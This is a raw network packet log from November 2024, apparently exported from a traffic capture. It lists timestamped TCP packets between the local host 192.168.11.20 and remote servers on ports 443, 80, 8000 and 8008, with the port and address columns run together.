                                                                                  Nov 8, 2024 10:42:22.252266884 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.252266884 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.252315998 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.252316952 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.252345085 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.252366066 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.252497911 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.252902031 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.252944946 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.253056049 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.253056049 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.253103018 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.253103018 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.253124952 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.253149986 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.253349066 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.253712893 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.253757000 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.253863096 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.253987074 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.253987074 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.254043102 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.254187107 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.254565001 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.254610062 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.254713058 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.254713058 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.254760981 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.254784107 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.254807949 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.254808903 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.254992962 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.255393982 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.255435944 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.255597115 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.255597115 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.255656958 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.255732059 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.255798101 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.256362915 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.256407022 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.256515980 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.256515980 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.256566048 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.256566048 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.256603003 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.256628036 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.256766081 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.257282019 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.257324934 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.257441998 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.257441998 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.257545948 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.257545948 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.257591009 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.257783890 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.258094072 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.258137941 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.258246899 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.258246899 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.258296967 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.258297920 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.258332014 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.258358955 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.258492947 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.258938074 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.258980989 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.259103060 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.259104013 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.259145021 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.259145021 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.259167910 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.259193897 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.259334087 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.259800911 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.259852886 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.259974003 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.260032892 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.260032892 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.260076046 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.260098934 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.260234118 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.260853052 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.260907888 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.261307955 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.261363029 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.261496067 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.261583090 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.261642933 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.262300014 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.262300968 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.262356997 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.262536049 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.262594938 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.262650013 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.262803078 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.262983084 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.263036013 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.263227940 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.263394117 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.263438940 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.263601065 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.263601065 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.263665915 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.263665915 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.263695955 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.263726950 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.263833046 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.264264107 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.264317036 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.264453888 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.264453888 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.264497042 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.264497995 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.264520884 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.264552116 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.264718056 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.264992952 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.265029907 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.265149117 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.265149117 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.265191078 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.265213013 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.265336990 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.265383005 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.265913963 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.265950918 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.266071081 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.266113997 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.266114950 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.266141891 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.266163111 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.266261101 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.266731977 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.266779900 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.267158985 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.267185926 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.267332077 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.267862082 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.267906904 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.268049002 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.268049002 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.268197060 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.268241882 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.268440962 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.268625021 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.268697977 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.268846035 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.268846989 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.268846989 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.268902063 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.269012928 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.269047022 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.269364119 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.269403934 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.269519091 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.269519091 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.269608974 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.269608974 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.269608974 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.269634962 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.269771099 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.270298958 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.270349979 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.270488024 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.270488977 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.270543098 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.270543098 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.270569086 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.270596981 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.270739079 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.271193027 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.271231890 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.271375895 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.271375895 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.271418095 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.271418095 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.271440983 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.271481991 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.271655083 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.271943092 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.272013903 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.272119999 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.272119999 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.272173882 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.272198915 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.272214890 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.272387028 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.272496939 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.272623062 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.272650957 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:22.272685051 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.272685051 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.272749901 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.272795916 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.272838116 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.273031950 CET49738443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:22.273051977 CET44349738104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:39.045834064 CET497408000192.168.11.2023.88.71.29
                                                                                  Nov 8, 2024 10:42:39.234287977 CET80004974023.88.71.29192.168.11.20
                                                                                  Nov 8, 2024 10:42:39.234448910 CET497408000192.168.11.2023.88.71.29
                                                                                  Nov 8, 2024 10:42:39.234606981 CET497408000192.168.11.2023.88.71.29
                                                                                  Nov 8, 2024 10:42:39.477267027 CET80004974023.88.71.29192.168.11.20
                                                                                  Nov 8, 2024 10:42:39.984611034 CET80004974023.88.71.29192.168.11.20
                                                                                  Nov 8, 2024 10:42:39.984622002 CET80004974023.88.71.29192.168.11.20
                                                                                  Nov 8, 2024 10:42:39.984630108 CET80004974023.88.71.29192.168.11.20
                                                                                  Nov 8, 2024 10:42:39.984637976 CET80004974023.88.71.29192.168.11.20
                                                                                  Nov 8, 2024 10:42:39.984862089 CET497408000192.168.11.2023.88.71.29
                                                                                  Nov 8, 2024 10:42:40.176111937 CET80004974023.88.71.29192.168.11.20
                                                                                  Nov 8, 2024 10:42:40.176367998 CET497408000192.168.11.2023.88.71.29
                                                                                  Nov 8, 2024 10:42:40.369093895 CET80004974023.88.71.29192.168.11.20
                                                                                  Nov 8, 2024 10:42:40.369236946 CET497408000192.168.11.2023.88.71.29
                                                                                  Nov 8, 2024 10:42:41.998146057 CET497418008192.168.11.20206.206.126.252
                                                                                  Nov 8, 2024 10:42:42.327927113 CET800849741206.206.126.252192.168.11.20
                                                                                  Nov 8, 2024 10:42:42.328109026 CET497418008192.168.11.20206.206.126.252
                                                                                  Nov 8, 2024 10:42:42.328252077 CET497418008192.168.11.20206.206.126.252
                                                                                  Nov 8, 2024 10:42:42.705070972 CET800849741206.206.126.252192.168.11.20
                                                                                  Nov 8, 2024 10:42:42.728471041 CET800849741206.206.126.252192.168.11.20
                                                                                  Nov 8, 2024 10:42:42.728559017 CET800849741206.206.126.252192.168.11.20
                                                                                  Nov 8, 2024 10:42:42.728569031 CET800849741206.206.126.252192.168.11.20
                                                                                  Nov 8, 2024 10:42:42.728576899 CET800849741206.206.126.252192.168.11.20
                                                                                  Nov 8, 2024 10:42:42.728653908 CET800849741206.206.126.252192.168.11.20
                                                                                  Nov 8, 2024 10:42:42.729007006 CET497418008192.168.11.20206.206.126.252
                                                                                  Nov 8, 2024 10:42:42.729134083 CET497418008192.168.11.20206.206.126.252
                                                                                  Nov 8, 2024 10:42:43.060623884 CET800849741206.206.126.252192.168.11.20
                                                                                  Nov 8, 2024 10:42:43.060775995 CET497418008192.168.11.20206.206.126.252
                                                                                  Nov 8, 2024 10:42:49.293075085 CET4973780192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:49.396042109 CET8049737104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:42:49.396243095 CET4973780192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:42:54.745317936 CET497428000192.168.11.2023.88.71.29
                                                                                  Nov 8, 2024 10:42:54.933845997 CET80004974223.88.71.29192.168.11.20
                                                                                  Nov 8, 2024 10:42:54.934030056 CET497428000192.168.11.2023.88.71.29
                                                                                  Nov 8, 2024 10:42:54.934159994 CET497428000192.168.11.2023.88.71.29
                                                                                  Nov 8, 2024 10:42:55.178688049 CET80004974223.88.71.29192.168.11.20
                                                                                  Nov 8, 2024 10:42:55.634740114 CET80004974223.88.71.29192.168.11.20
                                                                                  Nov 8, 2024 10:42:55.634749889 CET80004974223.88.71.29192.168.11.20
                                                                                  Nov 8, 2024 10:42:55.634757996 CET80004974223.88.71.29192.168.11.20
                                                                                  Nov 8, 2024 10:42:55.634819984 CET80004974223.88.71.29192.168.11.20
                                                                                  Nov 8, 2024 10:42:55.635299921 CET497428000192.168.11.2023.88.71.29
                                                                                  Nov 8, 2024 10:42:55.823798895 CET80004974223.88.71.29192.168.11.20
                                                                                  Nov 8, 2024 10:42:55.824052095 CET497428000192.168.11.2023.88.71.29
                                                                                  Nov 8, 2024 10:42:56.012367964 CET80004974223.88.71.29192.168.11.20
                                                                                  Nov 8, 2024 10:42:56.012630939 CET497428000192.168.11.2023.88.71.29
                                                                                  Nov 8, 2024 10:42:57.650825024 CET497438008192.168.11.20206.206.126.252
                                                                                  Nov 8, 2024 10:42:57.975399971 CET800849743206.206.126.252192.168.11.20
                                                                                  Nov 8, 2024 10:42:57.975637913 CET497438008192.168.11.20206.206.126.252
                                                                                  Nov 8, 2024 10:42:57.975765944 CET497438008192.168.11.20206.206.126.252
                                                                                  Nov 8, 2024 10:42:58.353880882 CET800849743206.206.126.252192.168.11.20
                                                                                  Nov 8, 2024 10:42:58.359704018 CET800849743206.206.126.252192.168.11.20
                                                                                  Nov 8, 2024 10:42:58.359791040 CET800849743206.206.126.252192.168.11.20
                                                                                  Nov 8, 2024 10:42:58.359798908 CET800849743206.206.126.252192.168.11.20
                                                                                  Nov 8, 2024 10:42:58.359806061 CET800849743206.206.126.252192.168.11.20
                                                                                  Nov 8, 2024 10:42:58.359812021 CET800849743206.206.126.252192.168.11.20
                                                                                  Nov 8, 2024 10:42:58.360060930 CET497438008192.168.11.20206.206.126.252
                                                                                  Nov 8, 2024 10:42:58.360224009 CET497438008192.168.11.20206.206.126.252
                                                                                  Nov 8, 2024 10:42:58.684643030 CET800849743206.206.126.252192.168.11.20
                                                                                  Nov 8, 2024 10:42:58.684881926 CET497438008192.168.11.20206.206.126.252
                                                                                  Nov 8, 2024 10:43:04.073543072 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:04.073621035 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:04.073786974 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:04.073909998 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:04.073920012 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:04.284804106 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:04.285335064 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:04.285343885 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:04.285712004 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:04.285720110 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.095166922 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.095217943 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.095247984 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.095326900 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.095396996 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:05.095410109 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.095670938 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:05.148840904 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:05.338952065 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.338984966 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.339081049 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.339124918 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.339140892 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:05.339152098 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.339359045 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:05.339517117 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.339529037 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.339535952 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:05.339545965 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.339735985 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:05.583486080 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.583621025 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.583638906 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.583818913 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:05.583831072 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.584023952 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:05.584038019 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.584218025 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:05.584229946 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.584598064 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:05.584794044 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.584832907 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.585016012 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.585114002 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:05.585125923 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.585491896 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:05.828569889 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.828604937 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.828687906 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.828751087 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.828773975 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.829035044 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:05.829035044 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:05.829049110 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.829157114 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:05.829341888 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:05.829348087 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.829355001 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.829500914 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.829511881 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:05.829524040 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.829898119 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:05.830187082 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.830434084 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.830585957 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:05.830598116 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.831142902 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:05.831268072 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.831322908 CET44349744104.21.86.219192.168.11.20
